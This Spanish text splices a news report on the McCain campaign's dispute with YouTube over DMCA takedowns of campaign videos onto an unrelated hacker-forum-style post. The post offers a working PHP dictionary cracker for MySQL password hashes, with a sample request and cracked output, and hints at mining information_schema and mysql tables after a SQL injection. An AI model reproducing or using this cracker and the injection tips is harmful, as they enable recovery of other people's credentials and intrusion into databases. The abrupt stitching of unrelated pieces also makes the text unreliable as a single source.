El asesor legal de la campaña de McCain, Trevor Potter, envió esta semana una carta a los ejecutivos de YouTube y de Google, en la que solicitó una 'completa revisión legal' de las notificaciones de remoción interpuestas contra los vídeos colocados por las campañas políticas.

YouTube está protegido por el Acta Digital del Milenio sobre Derecho de Autor (DMCA, por sus siglas en inglés), de tener responsabilidad por difundir material ilegal, siempre y cuando la compañía actué y lo remueva cuando sea notificada de un video que infringe el derecho de autor.

Aun así, YouTube enfrenta demandas de parte de compañías distribuidoras de discos y videos, de infringir las leyes de derecho de autor.

En la respuesta a la carta de la campaña de McCain, el abogado en jefe de YouTube, Zahavah Levine, explicó la dificultad que tienen jueces y abogados sobre lo que constituye un uso justo de los materiales con derecho de autor.

'Ningún número de abogados puede posiblemente determinar con un nivel razonable de certitud si todos los vídeos de los que recibimos quejas para que sean removidos califican como de uso justo', dijo Levine.

'La DMCA provee una salvaguarda de seguridad estatutaria para proveedores de servicio como YouTube que albergan contenido', explicó.

'Sin esta salvaguarda de seguridad, sitios como YouTube no pudieran existir. El problema real aquí es las entidades e individuos que abusan el proceso de la DMCA', agregó el abogado de la compañía.

McCain, quien se encuentra abajo en las encuestas y ha sido sobrepasado en gastos de publicidad por su contrincante, el demócrata Barack Obama, busca mantenerse vivo y sin menoscabo en el poderoso canal de difusión que significa YouTube.

En la actual contienda electoral en Estados Unidos, YouTube está robando en forma importante audiencias a las cadenas nacionales de televisión, al convertirse en un sitio casi imprescindible para las campañas políticas.

De acuerdo con el Centro de Investigación Pew, un 35 por ciento de los estadunidenses encuestados en la primavera pasada indicaron haber visto vídeos relacionados a las campañas políticas tres veces más que en 2004.

Por Correo me pidieron el crackeador con insistencia, así que en un tiempo libre que logre hacerme, hice este crackeador, el cual necesita una base de datos txt y un servidor MySQL (sirve permisos nobody):


<html>
<body>
<?php
$server = "localhost";
$usuario = "nobody";
$password = "";
$diccionario = "diccionario.txt";
if(is_array($_GET['hash'])) { print "Intento de Path Disclosure Detectado!\n"; exit; } else { $hash = $_GET['hash'];}
if(eregi("[SELECT]+[UNION]+[AND]+[OR]+[)]", $hash)) exit;
htmlentities($hash);
$link = mysql_connect($server, $usuario, $password);
if(!mysql_real_escape_string($hash, $link)) exit;
$archivo = file($diccionario);
foreach($archivo as $n=>$linea) {
$resultado = mysql_query("SELECT password('$linea')", $link);
while ($row = mysql_fetch_row($resultado)){
if($row[0] == $hash) {
die("<b>Password Encontrada:</b> $linea\n<br><b>Passwords Probadas:</b> $n\n<br>");
}
}}
?>
</body>
</html>

Ejemplo:

http://127.0.0.1/crackeador.php?hash=*E30E2ECBF3FC6D46D4239C068C14E6A202B1019B

Resultado:

Password Encontrada: xianur0
Passwords Probadas: 0

(lo encontró en el primer dato que leio xD...)

Suponiendo que tenemos una SQL Injection, pero no encontramos datos útiles, para ello tenemos muchas opciones que muchas veces están por default en los servidores, y otras tablas de administradores de archivos/bases de datos, también nos son útiles:

• information_schema
• mysql
• etc....